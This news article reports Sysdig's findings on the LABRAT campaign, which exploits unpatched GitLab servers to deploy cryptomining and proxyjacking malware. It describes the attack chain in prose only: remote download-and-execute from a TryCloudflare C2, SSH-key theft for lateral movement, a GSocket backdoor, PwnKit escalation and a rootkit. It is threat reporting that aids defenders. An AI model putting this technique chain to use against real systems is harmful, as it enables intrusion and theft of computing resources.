Proxyjacking campaign LABRAT targets vulnerable GitLab deployments

Researchers from Sysdig are warning of an ongoing attack campaign against vulnerable GitLab servers that results in deployment of cryptojacking and proxyjacking malware. The attacks use cross-platform malware, kernel rootkits, and multiple layers of obfuscation and try to evade detection by abusing legitimate services.

“This operation was much more sophisticated than many of the attacks the Sysdig TRT typically observes,” researchers from security firm Sysdig said in a new report. “Many attackers do not bother with stealth at all, but this attacker took special care when crafting their operation. The stealthy and evasive techniques and tools used in this operation make defense and detection more challenging.”

The attackers behind the attack campaign, which Sysdig has dubbed LABRAT, search for GitLab servers vulnerable to a known critical security issue tracked as CVE-2021-22205. This flaw stems from improper validation of image files when GitLab processes them with ExifTool and can result in remote code execution. It was patched in GitLab in April 2021 in versions 13.8.8, 13.9.6 and 13.10.3, but exploits for it are still actively used in attacks, meaning hackers find enough unpatched servers to justify its use.

Attackers exploit TryCloudflare to gain an advantage

Once they gain remote code execution, the attackers run a curl command to download and execute a malicious script for a command-and-control (C2) server with a trycloudflare.com hostname. TryCloudflare is a free-tier service provided by Cloudflare for users to evaluate various platform features. Attackers have been known to abuse it to obfuscate their actual C2 server location since Cloudflare’s CDN acts as a proxy in between.

Once executed on a system the script checks if the watchdog process is running and tries to kill it, deletes files from previous infections, disables Tencent Cloud and Alibaba defensive measure, downloads additional malicious binaries, sets up new system services, modifies cron jobs to achieve persistence, collects locally stored SSH keys which are then used to perform lateral movement to other systems.

To obfuscate their communication with the C2 servers, the attackers deployed the CloudFlare Tunnel, a powerful traffic tunneling solution that allows users to expose local services through the secure Cloudflare network without changing firewall settings or doing port forwarding. Researchers from GuidePoint Security recently reported an increase in the number of attacks that abused the Cloudflare Tunnel and TryCloudflare.

In some of the attacks, the LABRAT attackers hosted their malicious binaries on a private GitLab server that has been online since September 2022 but has been continuously updated. It’s not clears if the attackers own this server or if it’s a compromised one being misused to host their files.

LABRAT employs an advanced toolset

Across the various LABRAT attacks they investigated, the Sysdig researchers saw the threat actor behind the campaign use multiple off-the-shelf tools. One of them is an open-source tool called Global Socket (GSocket) that allows two systems inside different private networks to communicate with each other without the need of port forwarding. This is achieved through a network of proxies that use encryption and can also route traffic through Tor, making it very hard to discover the other machine.

In this case, GSocket was used as a backdoor through which attackers could remote access the system and issue commands. To achieve persistence and deploy GSocket as a service that starts at system reboot, the attackers tried to exploit the PwnKit (CVE-2021-4034) privilege escalation vulnerability on Linux systems.

The researchers also found evidence that the LABRAT attackers used an open-source rootkit called the hiding-cryptominers-linux-rootkit designed to hide files and processes and their CPU usage and is intended to obscure cryptomining activity.

That’s because LABRAT is ultimately a financially driven attack and one of the ways in which the attackers monetized the hacked servers was by deploying a custom variant of the open-source XMRig cryptocurrency mining program. This was deployed by a loader written in the Go programming language that ensured the crypto mining program was deployed as a service that masquerades as the legitimate sshd (SSH daemon) service.

Attackers also make money using IPRoyal-related tool

A second method of making money for the attackers was by deploying a tool associated with the IPRoyal service that allows users to share their bandwidth with others for a fee by deploying proxy software on their machines. This method of exploiting compromised machines is increasingly common and has been dubbed proxyjacking.

The researchers also found files associated with another proxy service called ProxyLite. The tool provided by this service is written in .NET Core, which makes it cross platform and it uses some advanced obfuscation techniques that seem to be designed to make detection and analysis harder.

“Crypomining and proxyjacking should never be considered nuisance malware and be written off by having the system rebuilt without a thorough investigation,” the Sysdig researchers warned. “As seen in this operation, malware does have the ability to automatically spread to other systems with SSH keys. We have also seen in the past, with SCARLETEEL, that attackers will install cryptominers, but also steal intellectual property if they have the opportunity.”

The Sysdig report contains various indicators of compromise associated with this ongoing campaign such as file names and hashes, malicious URLs and IP addresses that can be used to build detections.